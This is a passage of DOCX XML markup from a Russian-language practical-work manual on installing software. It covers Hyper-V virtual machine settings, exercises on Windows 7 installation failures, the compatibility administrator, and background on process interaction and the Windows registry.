                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откроется окно настроек для виртуальной машины. Здесь можно выбрать порядок проверки загрузки устройств во время запуска виртуальной машины, изменить объем виртуальной памяти (в том числе и выбрать динамический режим), установить число логических процессоров в диапазоне от 1 до 4 (как увеличить это значение читайте в статье Увеличение числа логических процессоров в виртуальной машине Hyper-V ), добавить еще один виртуальный жесткий диск и много другое. Например, чтобы добавить виртуальный дисковод компакт-дисков откроем вкладку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контроллер 1т IDE</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DVD-дисковод</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, где можно указать iso образ диска для виртуального дисковода или подключить в виртуальную машину физический дисковод компьютера. Для установки операционной системы укажем путь к образу установочного диска или вставим установочный диск в физический дисковод компьютера в соответствии с выбранными параметрами. Для сохранения всех настроек нажимаем </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Применить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7A61" w:rsidRPr="00617AC0" w:rsidRDefault="00DC7A61" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1816950" cy="1706658"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="63" name="Рисунок 26135" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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35" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image198.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect r="9520"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1817128" cy="1706825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DC7A61">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc507788262"/>
      <w:bookmarkStart w:id="32" w:name="_Toc507788537"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 2 Решение ситуационных задач на выбор методов для устранения проблем совместимости программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся рекомендации по установке и примерный текст консультации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решить ситуационные задачи согласно варианту.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача № 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На базе операционной системы Windows 7 x32 устанавливают офисный пакет MS Office x64. Установка проводится от имени администратора. Установка не завершается успехом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача № 2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На базе операционной системы Windows 7 x32 устанавливают обновление системы безопасности. Установка проводится от имени обычного пользователя системы. Установка не завершается успехом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача № 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На базе операционной системы Windows 7 x32 пользователь устанавливает приложение Pigion ICQ. Установка проводится от имени обычного пользователя системы. Установка не завершается успехом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задача № 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На базе операционной системы Windows 7 x64 устанавливается приложение 1С бухгалтерия (win95). Установка проводится от имени обычного пользователя системы. Установка не завершается успехом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся комментарии по поводу решения ситуационных задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="003C7D91">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контрольные вопросы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="003C7D91">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое виртуализация?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="003C7D91">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое виртуальная машина?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C7D91" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="003C7D91">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Для чего используется виртуальная машина?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="0094432D">
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc507786849"/>
      <w:bookmarkStart w:id="34" w:name="_Toc507788240"/>
      <w:bookmarkStart w:id="35" w:name="_Toc507788510"/>
      <w:bookmarkStart w:id="36" w:name="_Toc26278723"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Выявление и устранение проблем установки ПО </w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>для обработки офисных документов, графики, видео, звука</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc507788511"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки и настройки программного обеспечения</w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обработки офисных документов, графики, видео и звука составления инструкций для пользователя и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>беспечени</w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> взаимодействия программного обеспечения с офисными пакетами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">персональный компьютер, </w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">программное обеспечение для обработки офисных документов, графики, видео и звука; </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00100B8E" w:rsidRPr="00617AC0" w:rsidRDefault="00100B8E" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Выявление и устранение проблем установки ПО отраслевой направленности</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>для обработки офисных документов, графики</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="003C7D91" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C7D91" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="003C7D91" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используя администратор совместимости перенести настройки запуска офисного пакета с одного ПК на другой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты и описание этапов работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить администратор совместимости</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Согласно инструкциям из теоретической части сохранить настройки запуска приложений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перенести данные настройки и зарегистрировать их на другом компьютере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Наличие механизмов взаимодействия дает произвольным процессам возможность осуществлять обмен данными и синхронизировать свое выполнение с другими процессами. Мы уже рассмотрели несколько форм взаимодействия процессов, такие как канальная связь, использование поименованных каналов и посылка сигналов. Каналы (непоименованные) имеют недостаток, связанный с тем, что они известны только потомкам процесса, вызвавшего системную функцию pipe: не имеющие родственных связей процессы не могут взаимодействовать между собой с помощью непоименованных каналов. Несмотря на то, что поименованные каналы позволяют взаимодействовать между собой процессам, не имеющим родственных связей, они не могут использоваться ни в сети, ни в организации множественных связей между различными группами взаимодействующих процессов: поименованный канал не поддается такому мультиплексированию, при котором у каждой пары взаимодействующих процессов имелся бы свой выделенный канал. Произвольные процессы могут также связываться между собой благодаря посылке сигналов с помощью системной функции kill, однако такое </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сообщение</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> состоит из одного только номера сигнала. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Формы взаимодействия процессов: трассировка процессов, каким образом один процесс следит за ходом выполнения другого процесса, пакет IPC: сообщения, разделяемая память и семафоры, традиционные методы сетевого взаимодействия процессов, выполняющихся на разных машинах, представление о </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>гнездах</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, применяющихся в системе BSD, сетевое взаимодействияе, имеющее специальный характер, такие как протоколы, адресация и др.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Реестр представляет собой базу данных Windows, в которой содержатся важные сведения о системном оборудовании, установленных программах и их параметрах, а также профилях каждой из учетных записей пользователей компьютера. Windows постоянно обращается к этим сведениям.</w:t>
      </w:r>
    </w:p>
